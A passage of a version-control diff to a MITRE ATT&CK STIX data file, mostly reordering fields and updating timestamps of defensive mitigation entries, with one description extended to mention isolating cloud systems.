@@ -181384,7 +209220,7 @@
"description": "Block users or groups from installing or using unapproved hardware on systems, including USB devices.",
"id": "course-of-action--2995bc22-2851-4345-ad19-4e7e295be264",
"type": "course-of-action",
- "modified": "2019-06-11T16:28:41.809Z",
+ "modified": "2020-06-09T20:48:12.326Z",
"created": "2019-06-11T16:28:41.809Z",
"x_mitre_version": "1.0"
},
@@ -181426,8 +209262,8 @@
"type": "course-of-action",
"modified": "2019-08-17T12:10:09.748Z",
"created": "2018-10-17T00:14:20.652Z",
- "x_mitre_version": "1.0",
- "x_mitre_deprecated": true
+ "x_mitre_deprecated": true,
+ "x_mitre_version": "1.0"
},
{
"id": "course-of-action--06824aa2-94a5-474c-97f6-57c2e983d885",
@@ -181452,8 +209288,8 @@
"type": "course-of-action",
"modified": "2019-07-24T19:49:43.716Z",
"created": "2018-10-17T00:14:20.652Z",
- "x_mitre_version": "1.0",
- "x_mitre_deprecated": true
+ "x_mitre_deprecated": true,
+ "x_mitre_version": "1.0"
},
{
"id": "course-of-action--9ab7de33-99b2-4d8d-8cf3-182fa0015cc2",
@@ -181488,8 +209324,8 @@
"type": "course-of-action",
"modified": "2020-01-17T16:45:23.905Z",
"created": "2018-10-17T00:14:20.652Z",
- "x_mitre_version": "1.0",
- "x_mitre_deprecated": true
+ "x_mitre_deprecated": true,
+ "x_mitre_version": "1.0"
},
{
"id": "course-of-action--94f6b4f5-b528-4f50-91d5-f66457c2f8f7",
@@ -181509,8 +209345,8 @@
"type": "course-of-action",
"modified": "2019-07-25T11:12:34.303Z",
"created": "2018-10-17T00:14:20.652Z",
- "x_mitre_version": "1.0",
- "x_mitre_deprecated": true
+ "x_mitre_deprecated": true,
+ "x_mitre_version": "1.0"
},
{
"id": "course-of-action--45e7f570-6a0b-4095-bf02-4bca05da6bae",
@@ -181555,8 +209391,8 @@
"type": "course-of-action",
"modified": "2020-01-17T16:45:23.548Z",
"created": "2018-10-17T00:14:20.652Z",
- "x_mitre_version": "1.0",
- "x_mitre_deprecated": true
+ "x_mitre_deprecated": true,
+ "x_mitre_version": "1.0"
},
{
"id": "course-of-action--fe0aeb41-1a51-4152-8467-628256ea6adf",
@@ -181596,8 +209432,8 @@
"type": "course-of-action",
"modified": "2020-01-17T16:45:23.126Z",
"created": "2018-10-17T00:14:20.652Z",
- "x_mitre_version": "1.0",
- "x_mitre_deprecated": true
+ "x_mitre_deprecated": true,
+ "x_mitre_version": "1.0"
},
{
"id": "course-of-action--ed202147-4026-4330-b5bd-1e8dfa8cf7cc",
@@ -181642,8 +209478,8 @@
"type": "course-of-action",
"modified": "2020-01-17T16:45:23.884Z",
"created": "2018-10-17T00:14:20.652Z",
- "x_mitre_version": "1.0",
- "x_mitre_deprecated": true
+ "x_mitre_deprecated": true,
+ "x_mitre_version": "1.0"
},
{
"id": "course-of-action--d2dce10b-3562-4d61-b2f5-7c6384b038e2",
@@ -181663,8 +209499,8 @@
"type": "course-of-action",
"modified": "2019-07-25T11:14:01.112Z",
"created": "2018-10-17T00:14:20.652Z",
- "x_mitre_version": "1.0",
- "x_mitre_deprecated": true
+ "x_mitre_deprecated": true,
+ "x_mitre_version": "1.0"
},
{
"id": "course-of-action--514e7371-a344-4de7-8ec3-3aa42b801d52",
@@ -181689,10 +209525,13 @@
"type": "course-of-action",
"modified": "2019-07-25T11:14:24.192Z",
"created": "2018-10-17T00:14:20.652Z",
- "x_mitre_version": "1.0",
- "x_mitre_deprecated": true
+ "x_mitre_deprecated": true,
+ "x_mitre_version": "1.0"
},
{
+ "created": "2019-06-10T20:53:36.319Z",
+ "modified": "2019-06-10T20:53:36.319Z",
+ "type": "course-of-action",
"id": "course-of-action--b045d015-6bed-4490-bd38-56b41ece59a0",
"description": "Use two or more pieces of evidence to authenticate to a system; such as username and password in addition to a token from a physical smart card or token generator.",
"name": "Multi-factor Authentication",
@@ -181707,9 +209546,6 @@
"marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
],
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
- "type": "course-of-action",
- "modified": "2019-06-10T20:53:36.319Z",
- "created": "2019-06-10T20:53:36.319Z",
"x_mitre_version": "1.0"
},
{
@@ -181730,8 +209566,8 @@
"type": "course-of-action",
"modified": "2019-07-25T11:14:52.662Z",
"created": "2018-10-17T00:14:20.652Z",
- "x_mitre_version": "1.0",
- "x_mitre_deprecated": true
+ "x_mitre_deprecated": true,
+ "x_mitre_version": "1.0"
},
{
"id": "course-of-action--da987565-27b6-4b31-bbcd-74b909847116",
@@ -181756,8 +209592,8 @@
"type": "course-of-action",
"modified": "2019-07-25T11:15:17.942Z",
"created": "2018-10-17T00:14:20.652Z",
- "x_mitre_version": "1.0",
- "x_mitre_deprecated": true
+ "x_mitre_deprecated": true,
+ "x_mitre_version": "1.0"
},
{
"id": "course-of-action--24478001-2eb3-4b06-a02e-96b3d61d27ec",
@@ -181782,8 +209618,8 @@
"type": "course-of-action",
"modified": "2019-07-25T11:15:39.400Z",
"created": "2018-10-17T00:14:20.652Z",
- "x_mitre_version": "1.0",
- "x_mitre_deprecated": true
+ "x_mitre_deprecated": true,
+ "x_mitre_version": "1.0"
},
{
"id": "course-of-action--ac008435-af58-4f77-988a-c9b96c5920f5",
@@ -181843,8 +209679,8 @@
"type": "course-of-action",
"modified": "2020-01-17T16:45:23.913Z",
"created": "2018-10-17T00:14:20.652Z",
- "x_mitre_version": "1.0",
- "x_mitre_deprecated": true
+ "x_mitre_deprecated": true,
+ "x_mitre_version": "1.0"
},
{
"id": "course-of-action--624d063d-cda8-4616-b4e4-54c04e427aec",
@@ -181879,8 +209715,8 @@
"type": "course-of-action",
"modified": "2020-01-17T16:45:23.652Z",
"created": "2018-10-17T00:14:20.652Z",
- "x_mitre_version": "1.0",
- "x_mitre_deprecated": true
+ "x_mitre_deprecated": true,
+ "x_mitre_version": "1.0"
},
{
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
@@ -181905,8 +209741,8 @@
"type": "course-of-action",
"modified": "2019-07-25T11:16:48.088Z",
"created": "2019-04-19T18:46:47.964Z",
- "x_mitre_version": "1.0",
- "x_mitre_deprecated": true
+ "x_mitre_deprecated": true,
+ "x_mitre_version": "1.0"
},
{
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
@@ -181931,7 +209767,7 @@
{
"id": "course-of-action--86598de0-b347-4928-9eb0-0acbfc21908c",
"name": "Network Segmentation",
- "description": "Architect sections of the network to isolate critical systems, functions, or resources. Use physical and logical segmentation to prevent access to potentially sensitive systems and information. Use a DMZ to contain any internet-facing services that should not be exposed from the internal network.",
+ "description": "Architect sections of the network to isolate critical systems, functions, or resources. Use physical and logical segmentation to prevent access to potentially sensitive systems and information. Use a DMZ to contain any internet-facing services that should not be exposed from the internal network. Configure separate virtual private cloud (VPC) instances to isolate critical cloud systems.",
"external_references": [
{
"source_name": "mitre-attack",
@@ -181944,7 +209780,7 @@
],
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
"type": "course-of-action",
- "modified": "2020-03-31T13:07:48.112Z",
+ "modified": "2020-05-14T13:05:39.500Z",
"created": "2019-06-10T20:41:03.271Z",
"x_mitre_version": "1.1"
},
@@ -181991,8 +209827,8 @@
"type": "course-of-action",
"modified": "2020-01-17T16:45:23.559Z",
"created": "2018-10-17T00:14:20.652Z",
- "x_mitre_version": "1.0",
- "x_mitre_deprecated": true
+ "x_mitre_deprecated": true,
+ "x_mitre_version": "1.0"
},
{
"id": "course-of-action--94e95eeb-7cdb-4bd7-afba-f32fda303dbb",
@@ -182037,8 +209873,8 @@
"type": "course-of-action",
"modified": "2020-01-17T16:45:23.119Z",
"created": "2018-10-17T00:14:20.652Z",
- "x_mitre_version": "1.0",
- "x_mitre_deprecated": true
+ "x_mitre_deprecated": true,
+ "x_mitre_version": "1.0"
},
{
"id": "course-of-action--1f34230d-b6ae-4dc7-8599-78c18820bd21",
@@ -182083,8 +209919,8 @@
"type": "course-of-action",
"modified": "2020-01-17T16:45:23.867Z",
"created": "2018-10-17T00:14:20.652Z",
- "x_mitre_version": "1.0",
- "x_mitre_deprecated": true
+ "x_mitre_deprecated": true,
+ "x_mitre_version": "1.0"
},
{
"id": "course-of-action--46b7ef91-4e1d-43c5-a2eb-00fa9444f6f4",
@@ -182129,8 +209965,8 @@
"type": "course-of-action",
"modified": "2020-01-17T16:45:23.909Z",
"created": "2018-10-17T00:14:20.652Z",
- "x_mitre_version": "1.0",
- "x_mitre_deprecated": true
+ "x_mitre_deprecated": true,
+ "x_mitre_version": "1.0"
},
{
"object_marking_refs": [
@@ -182175,8 +210011,8 @@
"type": "course-of-action",
"modified": "2020-01-17T16:45:23.647Z",
"created": "2018-10-17T00:14:20.652Z",
- "x_mitre_version": "1.0",
- "x_mitre_deprecated": true
+ "x_mitre_deprecated": true,
+ "x_mitre_version": "1.0"
},
{
"id": "course-of-action--2f316f6c-ae42-44fe-adf8-150989e0f6d3",
@@ -182194,7 +210030,7 @@
],
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
"type": "course-of-action",
- "modified": "2020-03-31T13:08:20.546Z",
+ "modified": "2020-06-19T16:50:45.681Z",
"created": "2019-06-06T21:16:18.709Z",
"x_mitre_version": "1.1"
},
@@ -182221,8 +210057,8 @@
"type": "course-of-action",
"modified": "2019-07-25T11:21:20.411Z",
"created": "2018-10-17T00:14:20.652Z",
- "x_mitre_version": "1.0",
- "x_mitre_deprecated": true
+ "x_mitre_deprecated": true,
+ "x_mitre_version": "1.0"
},
{
"id": "course-of-action--3a476d83-43eb-4fad-9b75-b1febd834e3d",
@@ -182277,8 +210113,8 @@
"type": "course-of-action",
"modified": "2020-01-17T16:45:23.915Z",
"created": "2018-10-17T00:14:20.652Z",
- "x_mitre_version": "1.0",
- "x_mitre_deprecated": true
+ "x_mitre_deprecated": true,
+ "x_mitre_version": "1.0"
},
{
"id": "course-of-action--00d7d21b-69d6-4797-88a2-c86f3fc97651",
@@ -182303,8 +210139,8 @@
"type": "course-of-action",
"modified": "2019-07-25T11:22:19.139Z",
"created": "2018-10-17T00:14:20.652Z",
- "x_mitre_version": "1.0",
- "x_mitre_deprecated": true
+ "x_mitre_deprecated": true,
+ "x_mitre_version": "1.0"
},
{
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
@@ -182349,8 +210185,8 @@
"type": "course-of-action",
"modified": "2019-07-25T11:22:39.929Z",
"created": "2018-10-17T00:14:20.652Z",
- "x_mitre_version": "1.0",
- "x_mitre_deprecated": true
+ "x_mitre_deprecated": true,
+ "x_mitre_version": "1.0"
},
{
"id": "course-of-action--e0703d4f-3972-424a-8277-84004817e024",
@@ -182405,8 +210241,8 @@
"type": "course-of-action",
"modified": "2020-01-17T16:45:23.168Z",
"created": "2018-10-17T00:14:20.652Z",
- "x_mitre_version": "1.0",
- "x_mitre_deprecated": true
+ "x_mitre_deprecated": true,
+ "x_mitre_version": "1.0"
},
{
"id": "course-of-action--1881da33-fdf2-4eea-afd0-e04caf9c000f",
@@ -182451,8 +210287,8 @@
"type": "course-of-action",
"modified": "2020-01-17T16:45:23.899Z",
"created": "2018-10-17T00:14:20.652Z",
- "x_mitre_version": "1.0",
- "x_mitre_deprecated": true
+ "x_mitre_deprecated": true,
+ "x_mitre_version": "1.0"
},
{
"id": "course-of-action--dd9a85ad-6a92-4986-a215-b01d0ce7b987",
@@ -182497,8 +210333,8 @@
"type": "course-of-action",
"modified": "2020-01-17T16:45:23.874Z",
"created": "2018-10-17T00:14:20.652Z",
- "x_mitre_version": "1.0",
- "x_mitre_deprecated": true
+ "x_mitre_deprecated": true,
+ "x_mitre_version": "1.0"
},
{
"id": "course-of-action--2d704e56-e689-4011-b989-bf4e025a8727",
@@ -182518,8 +210354,8 @@
"type": "course-of-action",
"modified": "2019-07-25T11:25:29.091Z",
"created": "2018-10-17T00:14:20.652Z",
- "x_mitre_version": "1.0",
- "x_mitre_deprecated": true
+ "x_mitre_deprecated": true,
+ "x_mitre_version": "1.0"
},
{
"id": "course-of-action--f6b7c116-0821-4eb7-9b24-62bd09b3e575",
@@ -182539,8 +210375,8 @@
"type": "course-of-action",
"modified": "2019-07-25T11:25:50.338Z",
"created": "2018-10-17T00:14:20.652Z",
- "x_mitre_version": "1.0",
- "x_mitre_deprecated": true
+ "x_mitre_deprecated": true,
+ "x_mitre_version": "1.0"
},
{
"id": "course-of-action--1c6bc7f3-d517-4971-aed4-8f939090846b",
@@ -182565,8 +210401,8 @@
"type": "course-of-action",
"modified": "2019-07-25T11:26:14.570Z",
"created": "2018-10-17T00:14:20.652Z",
- "x_mitre_version": "1.0",
- "x_mitre_deprecated": true
+ "x_mitre_deprecated": true,
+ "x_mitre_version": "1.0"
},
{
"object_marking_refs": [
@@ -182591,8 +210427,8 @@
"type": "course-of-action",
"modified": "2019-07-25T11:26:37.066Z",
"created": "2018-10-17T00:14:20.652Z",
- "x_mitre_version": "1.0",
- "x_mitre_deprecated": true
+ "x_mitre_deprecated": true,
+ "x_mitre_version": "1.0"
},
{
"id": "course-of-action--f27ef4f2-71fe-48b6-b7f4-02dcac14320e",
@@ -182612,8 +210448,8 @@
"type": "course-of-action",
"modified": "2019-07-25T11:27:03.265Z",
"created": "2018-10-17T00:14:20.652Z",
- "x_mitre_version": "1.0",
- "x_mitre_deprecated": true
+ "x_mitre_deprecated": true,
+ "x_mitre_version": "1.0"
},
{
"id": "course-of-action--9bb9e696-bff8-4ae1-9454-961fc7d91d5f",
@@ -182651,7 +210487,7 @@
"description": "Protect processes with high privileges that can be used to interact with critical system components through use of protected process light, anti-process injection defenses, or other process integrity enforcement measures.",
"id": "course-of-action--72dade3e-1cba-4182-b3b3-a77ca52f02a1",
"type": "course-of-action",
- "modified": "2020-03-31T13:10:38.269Z",
+ "modified": "2020-05-20T13:13:48.900Z",
"created": "2019-06-06T21:08:58.465Z",
"x_mitre_version": "1.1"
},
@@ -182698,8 +210534,8 @@
"type": "course-of-action",
"modified": "2020-01-17T16:45:23.656Z",
"created": "2018-10-17T00:14:20.652Z",
- "x_mitre_version": "1.0",
- "x_mitre_deprecated": true
+ "x_mitre_deprecated": true,
+ "x_mitre_version": "1.0"
},
{
"id": "course-of-action--34d6a2ef-370e-4d21-a34b-6208b7c78f31",
@@ -182744,8 +210580,8 @@
"type": "course-of-action",
"modified": "2019-07-25T11:27:53.526Z",
"created": "2018-10-17T00:14:20.652Z",
- "x_mitre_version": "1.0",
- "x_mitre_deprecated": true
+ "x_mitre_deprecated": true,
+ "x_mitre_version": "1.0"
},
{
"id": "course-of-action--7c39ebbf-244e-4d1c-b0ac-b282453ece43",
@@ -182790,8 +210626,8 @@
"type": "course-of-action",
"modified": "2020-01-17T16:45:23.164Z",
"created": "2018-10-17T00:14:20.652Z",
- "x_mitre_version": "1.0",
- "x_mitre_deprecated": true
+ "x_mitre_deprecated": true,
+ "x_mitre_version": "1.0"
},
{
"id": "course-of-action--0640214c-95af-4c04-a574-2a1ba6dda00b",
@@ -182836,8 +210672,8 @@
"type": "course-of-action",
"modified": "2020-01-17T16:45:24.641Z",
"created": "2018-10-17T00:14:20.652Z",
- "x_mitre_version": "1.0",
- "x_mitre_deprecated": true
+ "x_mitre_deprecated": true,
+ "x_mitre_version": "1.0"
},
{
"id": "course-of-action--c3cf2312-3aab-4aaf-86e6-ab3505430482",
@@ -182857,8 +210693,8 @@
"type": "course-of-action",
"modified": "2019-07-25T11:29:48.385Z",
"created": "2018-10-17T00:14:20.652Z",
- "x_mitre_version": "1.0",
- "x_mitre_deprecated": true
+ "x_mitre_deprecated": true,
+ "x_mitre_version": "1.0"
},
{
"id": "course-of-action--61d02387-351a-453e-a575-160a9abc3e04",
@@ -182883,8 +210719,8 @@
"type": "course-of-action",
"modified": "2019-07-25T11:30:18.799Z",
"created": "2018-10-17T00:14:20.652Z",
- "x_mitre_version": "1.0",
- "x_mitre_deprecated": true
+ "x_mitre_deprecated": true,
+ "x_mitre_version": "1.0"
},
{
"id": "course-of-action--f9b3e5d9-7454-4b7d-bce6-27620e19924e",
@@ -182934,8 +210770,8 @@
"type": "course-of-action",
"modified": "2020-01-17T16:45:23.194Z",
"created": "2018-10-17T00:14:20.652Z",
- "x_mitre_version": "1.0",
- "x_mitre_deprecated": true
+ "x_mitre_deprecated": true,
+ "x_mitre_version": "1.0"
},
{
"id": "course-of-action--8b36d944-f274-4d46-9acd-dbba6927ce7a",
@@ -182980,8 +210816,8 @@
"type": "course-of-action",
"modified": "2020-01-17T16:45:23.869Z",
"created": "2018-10-17T00:14:20.652Z",
- "x_mitre_version": "1.0",
- "x_mitre_deprecated": true
+ "x_mitre_deprecated": true,
+ "x_mitre_version": "1.0"
},
{
"id": "course-of-action--a90da496-b460-47e8-92e7-cc36eb00bd9a",
@@ -183001,8 +210837,8 @@
"type": "course-of-action",
"modified": "2019-07-25T11:31:59.090Z",
"created": "2018-10-17T00:14:20.652Z",
- "x_mitre_version": "1.0",
- "x_mitre_deprecated": true
+ "x_mitre_deprecated": true,
+ "x_mitre_version": "1.0"
},
{
"id": "course-of-action--12c13879-b7bd-4bc5-8def-aacec386d432",
@@ -183027,8 +210863,8 @@
"type": "course-of-action",
"modified": "2019-07-25T11:32:22.755Z",
"created": "2018-10-17T00:14:20.652Z",
- "x_mitre_version": "1.0",
- "x_mitre_deprecated": true
+ "x_mitre_deprecated": true,
+ "x_mitre_version": "1.0"
},
{
"id": "course-of-action--af093bc8-7b59-4e2a-9da8-8e839b4c50c6",
@@ -183048,8 +210884,8 @@
"type": "course-of-action",
"modified": "2019-07-25T11:32:44.821Z",
"created": "2018-10-17T00:14:20.652Z",
- "x_mitre_version": "1.0",
- "x_mitre_deprecated": true
+ "x_mitre_deprecated": true,
+ "x_mitre_version": "1.0"
},
{
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
@@ -183099,8 +210935,8 @@
"type": "course-of-action",
"modified": "2019-07-25T11:33:10.069Z",
"created": "2018-10-17T00:14:20.652Z",
- "x_mitre_version": "1.0",
- "x_mitre_deprecated": true
+ "x_mitre_deprecated": true,
+ "x_mitre_version": "1.0"
},
{
"id": "course-of-action--cdecc44a-1dbf-4c1f-881c-f21e3f47272a",
@@ -183125,8 +210961,8 @@
"type": "course-of-action",
"modified": "2019-07-25T11:33:35.477Z",
"created": "2018-10-17T00:14:20.652Z",
- "x_mitre_version": "1.0",
- "x_mitre_deprecated": true
+ "x_mitre_deprecated": true,
+ "x_mitre_version": "1.0"
},
{
"id": "course-of-action--9a902722-cecd-4fbe-a6c9-49333aa0f8c2",
@@ -183171,8 +211007,8 @@
"type": "course-of-action",
"modified": "2020-01-17T16:45:23.921Z",
"created": "2018-10-17T00:14:20.652Z",
- "x_mitre_version": "1.0",
- "x_mitre_deprecated": true
+ "x_mitre_deprecated": true,
+ "x_mitre_version": "1.0"
},
{
"id": "course-of-action--effb83a0-ead1-4b36-b7f6-b7bdf9c4616e",
@@ -183227,8 +211063,8 @@
"type": "course-of-action",
"modified": "2020-01-17T16:45:23.877Z",
"created": "2018-10-17T00:14:20.652Z",
- "x_mitre_version": "1.0",
- "x_mitre_deprecated": true
+ "x_mitre_deprecated": true,
+ "x_mitre_version": "1.0"
},
{
"id": "course-of-action--46acc565-11aa-40ba-b629-33ba0ab9b07b",
@@ -183273,8 +211109,8 @@
"type": "course-of-action",
"modified": "2020-01-17T16:45:24.247Z",
"created": "2019-04-24T16:59:33.603Z",
- "x_mitre_deprecated": true,
- "x_mitre_version": "1.0"
+ "x_mitre_version": "1.0",
+ "x_mitre_deprecated": true
},
{
"id": "course-of-action--987988f0-cf86-4680-a875-2f6456ab2448",
@@ -183292,11 +211128,14 @@
],
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
"type": "course-of-action",
- "modified": "2020-03-31T13:11:05.677Z",
+ "modified": "2020-05-20T15:12:39.136Z",
"created": "2019-06-06T20:54:49.964Z",
"x_mitre_version": "1.1"
},
{
+ "created": "2019-06-11T17:00:01.740Z",
+ "modified": "2019-06-11T17:00:01.740Z",
+ "type": "course-of-action",
"id": "course-of-action--e8242a33-481c-4891-af63-4cf3e4cf6aff",
"description": "Prevent abuse of library loading mechanisms in the operating system and software to load untrusted code by configuring appropriate library loading mechanisms and investigating potential vulnerable software.",
"name": "Restrict Library Loading",
@@ -183311,12 +211150,12 @@
"marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
],
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
- "type": "course-of-action",
- "modified": "2019-06-11T17:00:01.740Z",
- "created": "2019-06-11T17:00:01.740Z",
"x_mitre_version": "1.0"
},
{
+ "created": "2019-06-06T20:58:59.577Z",
+ "modified": "2019-06-06T20:58:59.577Z",
+ "type": "course-of-action",
"id": "course-of-action--a2c36a5d-4058-475e-8e77-fff75e50d3b9",
"description": "Restrict the ability to modify certain hives or keys in the Windows Registry.",
"name": "Restrict Registry Permissions",
@@ -183331,12 +211170,12 @@
"marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
],
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
- "type": "course-of-action",
- "modified": "2019-06-06T20:58:59.577Z",
- "created": "2019-06-06T20:58:59.577Z",
"x_mitre_version": "1.0"
},
{
+ "created": "2019-06-06T20:52:59.206Z",
+ "modified": "2019-06-06T20:52:59.206Z",
+ "type": "course-of-action",
"id": "course-of-action--21da4fd4-27ad-4e9c-b93d-0b9b14d02c96",
"description": "Restrict use of certain websites, block downloads/attachments, block Javascript, restrict browser extensions, etc.",
"name": "Restrict Web-Based Content",
@@ -183351,9 +211190,6 @@
"marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
],
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
- "type": "course-of-action",
- "modified": "2019-06-06T20:52:59.206Z",
- "created": "2019-06-06T20:52:59.206Z",
"x_mitre_version": "1.0"
},
{
@@ -183399,8 +211235,8 @@
"type": "course-of-action",
"modified": "2020-01-17T16:45:23.192Z",
"created": "2018-10-17T00:14:20.652Z",
- "x_mitre_version": "1.0",
- "x_mitre_deprecated": true
+ "x_mitre_deprecated": true,
+ "x_mitre_version": "1.0"
},
{
"id": "course-of-action--8c918d8a-11c5-4ffd-af10-e74bc06bdfae",
@@ -183425,8 +211261,8 @@
"type": "course-of-action",
"modified": "2019-07-25T11:36:40.673Z",
"created": "2018-10-17T00:14:20.652Z",
- "x_mitre_version": "1.0",
- "x_mitre_deprecated": true
+ "x_mitre_deprecated": true,
+ "x_mitre_version": "1.0"
},
{
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
@@ -183471,8 +211307,8 @@
"type": "course-of-action",
"modified": "2020-01-17T16:45:23.880Z",
"created": "2019-04-12T14:59:36.522Z",
- "x_mitre_version": "1.0",
- "x_mitre_deprecated": true
+ "x_mitre_deprecated": true,
+ "x_mitre_version": "1.0"
},
{
"id": "course-of-action--b91c2f9e-c1a0-44df-95f0-9e7c9d1d5e55",
@@ -183512,8 +211348,8 @@
"type": "course-of-action",
"modified": "2019-07-25T11:37:35.427Z",
"created": "2018-10-17T00:14:20.652Z",
- "x_mitre_version": "1.0",
- "x_mitre_deprecated": true
+ "x_mitre_deprecated": true,
+ "x_mitre_version": "1.0"
},
{
"id": "course-of-action--ef273807-c465-4728-9cee-5823422f42ee",
@@ -183538,8 +211374,8 @@
"type": "course-of-action",
"modified": "2019-07-25T11:38:03.304Z",
"created": "2018-10-17T00:14:20.652Z",
- "x_mitre_version": "1.0",
- "x_mitre_deprecated": true
+ "x_mitre_deprecated": true,
+ "x_mitre_version": "1.0"
},
{
"id": "course-of-action--41cff8e9-fd05-408e-b3d5-d98c54c20bcf",
@@ -183564,10 +211400,13 @@
"type": "course-of-action",
"modified": "2019-07-25T11:38:28.944Z",
"created": "2018-10-17T00:14:20.652Z",
- "x_mitre_version": "1.0",
- "x_mitre_deprecated": true
+ "x_mitre_deprecated": true,
+ "x_mitre_version": "1.0"
},
{
+ "created": "2019-06-06T20:15:34.146Z",
+ "modified": "2019-06-06T20:15:34.146Z",
+ "type": "course-of-action",
"id": "course-of-action--7bb5fae9-53ad-4424-866b-f0ea2a8b731d",
"description": "Break and inspect SSL/TLS sessions to look at encrypted web traffic for adversary activity.",
"name": "SSL/TLS Inspection",
@@ -183582,9 +211421,6 @@
"marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
],
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
- "type": "course-of-action",
- "modified": "2019-06-06T20:15:34.146Z",
- "created": "2019-06-06T20:15:34.146Z",
"x_mitre_version": "1.0"
},
{
@@ -183645,8 +211481,8 @@
"type": "course-of-action",
"modified": "2020-01-17T16:45:23.257Z",
"created": "2018-10-17T00:14:20.652Z",
- "x_mitre_version": "1.0",
- "x_mitre_deprecated": true
+ "x_mitre_deprecated": true,
+ "x_mitre_version": "1.0"
},
{
"id": "course-of-action--1c0711c8-2a73-48a1-893d-ff88bcd23824",
@@ -183671,8 +211507,8 @@
"type": "course-of-action",
"modified": "2019-07-25T11:39:28.002Z",
"created": "2018-10-17T00:14:20.652Z",
- "x_mitre_version": "1.0",
- "x_mitre_deprecated": true
+ "x_mitre_deprecated": true,
+ "x_mitre_version": "1.0"
},
{
"id": "course-of-action--51b37302-b844-4c08-ac98-ae6955ed1f55",
@@ -183717,8 +211553,8 @@
"type": "course-of-action",
"modified": "2020-01-17T16:45:24.643Z",
"created": "2018-10-17T00:14:20.652Z",
- "x_mitre_version": "1.0",
- "x_mitre_deprecated": true
+ "x_mitre_deprecated": true,
+ "x_mitre_version": "1.0"
},
{
"id": "course-of-action--9da16278-c6c5-4410-8a6b-9c16ce8005b3",
@@ -183743,8 +211579,8 @@
"type": "course-of-action",
"modified": "2019-07-25T11:40:31.541Z",
"created": "2018-10-17T00:14:20.652Z",
- "x_mitre_version": "1.0",
- "x_mitre_deprecated": true
+ "x_mitre_deprecated": true,
+ "x_mitre_version": "1.0"
},
{
"id": "course-of-action--57019a80-8523-46b6-be7d-f763a15a2cc6",
@@ -183774,8 +211610,8 @@
"type": "course-of-action",
"modified": "2019-07-25T11:40:52.342Z",
"created": "2018-10-17T00:14:20.652Z",
- "x_mitre_version": "1.0",
- "x_mitre_deprecated": true
+ "x_mitre_deprecated": true,
+ "x_mitre_version": "1.0"
},
{
"object_marking_refs": [
@@ -183820,8 +211656,8 @@
"type": "course-of-action",
"modified": "2020-01-17T16:45:23.262Z",
"created": "2018-10-17T00:14:20.652Z",
- "x_mitre_version": "1.0",
- "x_mitre_deprecated": true
+ "x_mitre_deprecated": true,
+ "x_mitre_version": "1.0"
},
{
"id": "course-of-action--9e57c770-5a39-49a2-bb91-253ba629e3ac",
@@ -183851,8 +211687,8 @@
"type": "course-of-action",
"modified": "2019-07-25T11:41:39.946Z",
"created": "2018-10-17T00:14:20.652Z",
- "x_mitre_version": "1.0",
- "x_mitre_deprecated": true
+ "x_mitre_deprecated": true,
+ "x_mitre_version": "1.0"
},
{
"object_marking_refs": [
@@ -183897,8 +211733,8 @@
"type": "course-of-action",
"modified": "2020-01-17T16:45:24.245Z",
"created": "2018-10-17T00:14:20.652Z",
- "x_mitre_version": "1.0",
- "x_mitre_deprecated": true
+ "x_mitre_deprecated": true,
+ "x_mitre_version": "1.0"
},
{
"id": "course-of-action--9378f139-10ef-4e4b-b679-2255a0818902",
@@ -183933,8 +211769,8 @@
"type": "course-of-action",
"modified": "2020-01-17T16:45:24.258Z",
"created": "2018-10-17T00:14:20.652Z",
- "x_mitre_version": "1.0",
- "x_mitre_deprecated": true
+ "x_mitre_deprecated": true,
+ "x_mitre_version": "1.0"
},
{
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
@@ -183954,8 +211790,8 @@
"type": "course-of-action",
"modified": "2019-07-25T11:42:52.240Z",
"created": "2019-04-24T17:01:10.433Z",
- "x_mitre_version": "1.0",
- "x_mitre_deprecated": true
+ "x_mitre_deprecated": true,
+ "x_mitre_version": "1.0"
},
{
"id": "course-of-action--073cc04d-ac46-4f5a-85d7-83a91ecd6a19",
@@ -183975,8 +211811,8 @@
"type": "course-of-action",
"modified": "2019-07-25T11:43:19.870Z",
"created": "2018-10-17T00:14:20.652Z",
- "x_mitre_version": "1.0",
- "x_mitre_deprecated": true
+ "x_mitre_deprecated": true,
+ "x_mitre_version": "1.0"
},
{
"id": "course-of-action--43b366a4-b5ff-4d4e-8a3b-f09a9d2faff5",
@@ -184006,8 +211842,8 @@
"type": "course-of-action",
"modified": "2019-07-25T11:43:54.859Z",
"created": "2018-10-17T00:14:20.652Z",
- "x_mitre_version": "1.0",
- "x_mitre_deprecated": true
+ "x_mitre_deprecated": true,
+ "x_mitre_version": "1.0"
},
{
"id": "course-of-action--a13e35cc-8c90-4d77-a965-5461042c1612",
@@ -184057,8 +211893,8 @@
"type": "course-of-action",
"modified": "2020-01-17T16:45:23.907Z",
"created": "2018-10-17T00:14:20.652Z",
- "x_mitre_version": "1.0",
- "x_mitre_deprecated": true
+ "x_mitre_deprecated": true,
+ "x_mitre_version": "1.0"
},
{
"id": "course-of-action--51048ba0-a5aa-41e7-bf5d-993cd217dfb2",
@@ -184078,8 +211914,8 @@
"type": "course-of-action",
"modified": "2019-07-25T11:45:01.486Z",
"created": "2018-10-17T00:14:20.652Z",
- "x_mitre_version": "1.0",
- "x_mitre_deprecated": true
+ "x_mitre_deprecated": true,
